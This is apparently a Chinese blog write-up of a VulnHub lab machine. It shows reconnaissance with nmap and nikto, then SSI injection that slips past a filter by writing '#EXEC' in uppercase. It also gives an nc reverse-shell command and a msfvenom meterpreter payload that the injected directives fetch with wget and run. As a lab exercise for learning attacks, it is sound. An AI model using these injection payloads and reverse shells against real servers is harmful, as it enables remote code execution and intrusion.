SSI注入实战


靶机环境

靶机下载网站:https://www.vulnhub.com/
使用Vmware虚拟机中NAT网络
靶机 192.168.146.150
攻击机 parrot 192.168.146.129


一、服务器信息搜集

-A 全面扫描(主动扫描)
-p-全端口扫描

nmap -p- -A 192.168.146.150

在这里插入图片描述
👆发现只有开放80端口,并且服务器用的是Ubuntu,中间件为Apache

二、网站信息搜集

1.使用nikto扫描网站目录

nikto 是一款用来发现 web 应用程序漏洞的一个工具,常用于对web网页服务器进行全面的多种扫描

nikto -h http://192.168.146.150

扫描出敏感文件/spukcab/,并且响应为200

在这里插入图片描述
↓访问其url发现两个备份文件
在这里插入图片描述
分别下载到Download里面
在这里插入图片描述
分别查看审计👇,但是并没发现什么有价值的信息哦~
分别是网页源代码和配置信息
在这里插入图片描述
在这里插入图片描述

2.浏览网站

首先是一个登录界面
开burpsuite抓包看一下
代码如下(示例):

sudo burpsuite

并没有发现什么可利用的地方
在这里插入图片描述


三、SSI注入漏洞利用

1、SSI注入简介:

Server Side Injection,即服务器端注入。SSI 是类似于 CGI,用于html动态页面的指令。
若网站目录中发现了stm shtml shtm 的文件后缀名,并且网站对ssi的输入没有进行严格过滤
就有可能允许远程在 Web 应用中注入脚本来执行代码,造成SSI注入攻击。

2、SSI注入测试网站

都输入👇并且点击submit提交

<!--#exec cmd="whoami" -->

在这里插入图片描述
关键敏感字符可能被过滤掉了
在这里插入图片描述
考虑大写翻转进行绕过再提交

<!--#EXEC cmd="whoami" -->

在这里插入图片描述
注入测试成功😄O(∩_∩)O
在这里插入图片描述

四、利用nc反弹shell——失败

ps:本靶机利用nc正向和反向反弹shell经测试后都行不通
parrot建立监听

nc -lvp 4444
<!--#EXEC cmd="nc -e /bin/bash 192.168.146.129 4444" -->

在这里插入图片描述
提交后parrot上没有反应——失败/(ㄒoㄒ)/~~

五、使用msf框架

1、python木马生成

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.146.129 lport=4444 -f raw > shell.py

在这里插入图片描述
在这里插入图片描述

2、建立木马监听端

msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set lhost 192.168.146.129
set lpoet 4444
exploit

在这里插入图片描述

3、上传木马文件到本地web服务器上

先把刚刚制作好的python木马移动到var/www/html里

sudo mv /root/shell.py /var/www/html

在这里插入图片描述
**开启apache服务**

service apache2 start

4、构造SSI注入语句执行木马

<!--#EXEC cmd="wget http://192.168.146.129/shell.py"-->

在这里插入图片描述
给传上去的木马文件加权限👇

<!--#EXEC cmd="chmod 777 shell.py"-->

在这里插入图片描述
执行木马

<!--#EXEC cmd="python shell.py"-->

在这里插入图片描述
在这里插入图片描述
成功上线😀,收工啦~~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值